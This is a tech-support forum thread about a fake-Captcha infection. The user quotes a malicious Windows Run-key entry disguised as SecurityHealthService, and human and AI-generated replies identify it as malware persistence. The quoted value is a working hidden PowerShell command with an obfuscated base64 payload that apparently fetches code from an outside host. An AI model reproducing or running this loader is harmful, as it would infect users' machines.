Share via

Is SecurityHealthService supposed to be in HKEY_CURRENT_USER?

Isaac Chan 0 Reputation points
2026-04-25T15:58:39.7433333+00:00

I recently came across a website that prompts you to run something with PowerShell with a fake Captcha. When the terminal opened, I misclicked and ran the script instead. After that, every time I boot up my laptop (Asus Vivobook S14 running on Windows 11), a PowerShell pops up and disappears immediately. I've done everything else, Microsoft Defender scan, MalwareBytes, installing McAfee, checking Task Manager, Task Scheduler, and a bunch of Sysinternals. I could not identify anything that's suspicious, at least not to me.

So I did a little digging and ended up checking the Registry Editor. Under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, I found something called the SecurityHealthService with a value data of

powershell -w h -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaAAnACwAJwAtAGUAcAAnACwAJwBiAHkAcABhAHMAcwAnACwAJwAtAGUAbgBjACcALAAnAGQAQQBCAHkAQQBIAGsAQQBlAHcAQgBwAEEARwBVAEEAZQBBAEEAbwBBAEcAawBBAGMAZwBCAHQAQQBDAEEAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEgATQBBAE8AZwBBAHYAQQBDADgAQQBhAEEAQgBoAEEARwAwAEEAYQBRAEIAbABBAEcAMABBAGEAUQBCAGwAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEATAB3AEIANABBAEUARQBBAGUAUQBBAHcAQQBIAEEAQQBkAGcAQQAwAEEARwB3AEEAUAB3AEIAMABBAEQAMABBAFEAZwBCAGoAQQBFAFkAQQBWAHcAQgBsAEEARQBnAEEAYwBnAEEAeABBAEYAQQBBAGUAQQBCAGkAQQBEAE0AQQBiAGcAQgBrAEEARgBnAEEATABRAEIAbQBBAEYAYwBBAFUAZwBBAHQAQQBGADgAQQBVAFEAQQBuAEEAQwBrAEEAZgBRAEIAagBBAEcARQBBAGQAQQBCAGoAQQBHAGcAQQBlAHcAQgB6AEEARwB3AEEAWgBRAEIAbABBAEgAQQBBAEkAQQBBAHgAQQBEAHMAQQBhAFEAQgBsAEEASABnAEEASwBBAEIAcABBAEgASQBBAGIAUQBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBZAFEAQgB0AEEARwBrAEEAWgBRAEIAdABBAEcAawBBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAZQBBAEIAQgBBAEgAawBBAE0AQQBCAHcAQQBIAFkAQQBOAEEAQgBzAEEARAA4AEEAZABBAEEAOQBBAEUASQBBAFkAdwBCAEcAQQBGAGMAQQBaAFEAQgBJAEEASABJAEEATQBRAEIAUQBBAEgAZwBBAFkAZwBBAHoAQQBHADQAQQBaAEEAQgBZAEEAQwAwAEEAWgBnAEIAWABBAEYASQBBAEwAUQBCAGYAQQBGAEUAQQBKAHcAQQBwAEEASAAwAEEATwB3AEIAcABBAEgASQBBAGIAUQBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGcAQQBZAFEAQgB0AEEARwBrAEEAWgBRAEIAdABBAEcAawBBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQwA4AEEAZQBBAEIAQgBBAEgAawBBAE0AQQBCAHcAQQBIAFkAQQBOAEEAQgBzAEEARAA4AEEAYwB3AEEAOQBBAEQASQBBAEoAZwBCAHcAQQBEADAAQQBNAFEAQQBtAEEASABRAEEAUABRAEIAQwBBAEcATQBBAFIAZwBCAFgAQQBHAFUAQQBTAEEAQgB5AEEARABFAEEAVQBBAEIANABBAEcASQBBAE0AdwBCAHUAQQBHAFEAQQBXAEEAQQB0AEEARwBZAEEAVgB3AEIAUwBBAEMAMABBAFgAdwBCAFIAQQBDAGMAQQBmAEEAQgBwAEEARwBVAEEAZQBBAEEAPQAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA=

Now what I don't know is if it's supposed to be there. From other forums, it says it's supposed to be in HKEY_LOCAL_MACHINE instead and it should not run PowerShell. But I'm not familiar with PowerShell and I would really want a second opinion.

Windows for home | Windows 11 | Security and privacy
0 comments

2 answers

Sort by: Most helpful
Most helpful Newest Oldest
  1. Ramesh Srinivasan 81,160 Reputation points Independent Advisor
    2026-04-25T16:43:34.5166667+00:00

    Hi Issac,

    It's malicious code. Please delete the SecurityHealthService entry.

    Also, share your Farbar scan logs.

    • Download Farbar Recovery Scan Tool 64-bit FRST64.exe
    • If the OS language is not English, rename FRST64.exe to FRST64English.exe.
    • Run the program. Don't check or uncheck any options. Click "Scan".
    • Add the two logs, FRST.txt and Addition.txt, to a zip archive.
    • Share the zip file on OneDrive or GoFile.io, and post the link here.

    Note: If Microsoft Edge or Chrome mislabels the Farbar Scanner executable as PUA/malware, choose to keep it by tapping … in the bottom bar, choosing Keep, and then choosing Keep anyway in the dialog that appears. See this screenshot. It's a safe tool used in most antimalware forums.

    Standard Disclaimer: There is a link to a non-Microsoft website. The page appears to provide accurate, safe information. Watch out for ads on the site that may advertise products frequently classified as PUPs (Potentially Unwanted Products). Thoroughly research any product advertised on the site before you decide to download and install it.

    Was this answer helpful?

    1 person found this answer helpful.

  2. AI answer

    2026-04-25T15:58:53.52+00:00

    SecurityHealthService should not be starting PowerShell from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. That entry is almost certainly malicious persistence created by the script that ran from the fake Captcha site.

    Legitimate Windows security components work differently:

    • Windows Security uses the Windows Security Service (SecurityHealthService / Windows Security Health Service), which in turn uses the Windows Security Center Service (wscsvc). These are normal Windows services, not per-user Run entries, and they do not launch PowerShell at logon.
    • The Windows Security Center Service (wscsvc) lives under the services registry path HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wscsvc, not under HKCU\...\Run.
    • Disabling or modifying these services affects reporting of security status, but they still do not rely on a PowerShell -ExecutionPolicy Bypass or -enc (encoded command) style startup.

    The value you found:

    • Runs powershell with -w h (hidden window) and -enc (base64-encoded command), which is a common malware pattern to hide what the script is doing.
    • Is stored under the current user’s Run key, which is a standard persistence mechanism for malware.

    Additionally, Windows guidance explicitly warns that services and security components are defined under HKEY_LOCAL_MACHINE service keys, and that incorrect or unexpected registry entries can indicate corruption or tampering.

    Given all of this, that SecurityHealthService value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run is not normal and should be treated as malicious. Removing that Run entry and then rechecking the system (including the real wscsvc service key under HKLM\SYSTEM\CurrentControlSet\services\wscsvc) is appropriate. If issues with Windows Security persist, follow the documented steps for repairing the wscsvc registry key and be sure to back up the registry before making changes.

    References:

    AI-generated content may be incorrect. Read our transparency notes for more information.

    Was this answer helpful?

Your answer

Answers can be marked as 'Accepted' by the question author and 'Recommended' by moderators, which helps users know the answer solved the author's problem.